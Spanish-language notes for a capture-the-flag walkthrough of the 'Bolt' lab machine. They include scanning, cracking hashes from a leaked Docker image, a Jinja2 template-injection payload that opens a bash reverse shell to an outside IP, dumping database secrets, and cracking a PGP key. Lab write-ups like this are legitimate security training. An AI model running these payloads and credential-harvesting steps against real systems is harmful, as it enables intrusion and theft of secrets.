nmap -A -p- -oA bolt 10.129.164.193 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA bolt 10.129.164.193

nmap -sU -O -p- -oA bolt-udp 10.129.164.193

nikto -h 10.129.164.193:80

Pasted image 20220118192352.png

Pasted image 20220118193013.png

echo "10.129.164.193 bolt.htb demo.bolt.htb mail.bolt.htb" | sudo tee -a /etc/hosts

Pasted image 20220118193125.png

ffuf -u "http://10.10.11.114/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt

Pasted image 20220118193348.png

http://10.129.164.193/sign-up

Pasted image 20220118193534.png

Bajamos el archivo .tar

http://10.129.164.193/download

Pasted image 20220118193658.png

tar xvf image.tar -C .

Pasted image 20220118194522.png

tar xvf layer.tar -C .

Pasted image 20220118194610.png

sqlite3 a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer/db.sqlite3

select * from user;

Pasted image 20220118194735.png

john --wordlist=/usr/share/worldlists/rockyou.txt hash

Pasted image 20220118194933.png

Conseguimos las credenciales -> admin:deadbolt

En 41093412e0da959c80875bb0db640c1302d5bcdffec759a3a5670950272789ad/app/base/routes.py

Conseguimos el codigo de invitacion.

Pasted image 20220119060606.png

XNSS-HSJW-3NGU-8XTJ

Pasted image 20220119061935.png

Pasted image 20220119062058.png

{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i &>/dev/tcp/10.10.14.135/443 <&1"').read() }}

Pasted image 20220119063538.png

http://mail.bolt.htb

Y le damos click al enlace

Pasted image 20220119063720.png

Encontramos un archivo en /etc/passbolt

Pasted image 20220119064449.png

Credenciales -> passbolt:rT2;jW7<eY8!dX8}pQ8%

Pasted image 20220119064727.png

mysql -upassbolt -p

Pasted image 20220119064942.png

desc secrets;

select data from secrets;

Pasted image 20220119065202.png

Credenciales -> eddie:rT2;jW7<eY8!dX8}pQ8%

su eddie

cat /var/mail/eddie

Pasted image 20220119070007.png

vim config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log

Pasted image 20220119070336.png

Conseguimos el pgp.key

Pasted image 20220119072154.png

gpg2john gpg.key > gpg.hash

cat gpg.hash

Pasted image 20220119072402.png

john --wordlist=/usr/share/wordlists/rockyou.txt gpg.hash

boxes

copyright©2022 Cu3rv0x all rights reserved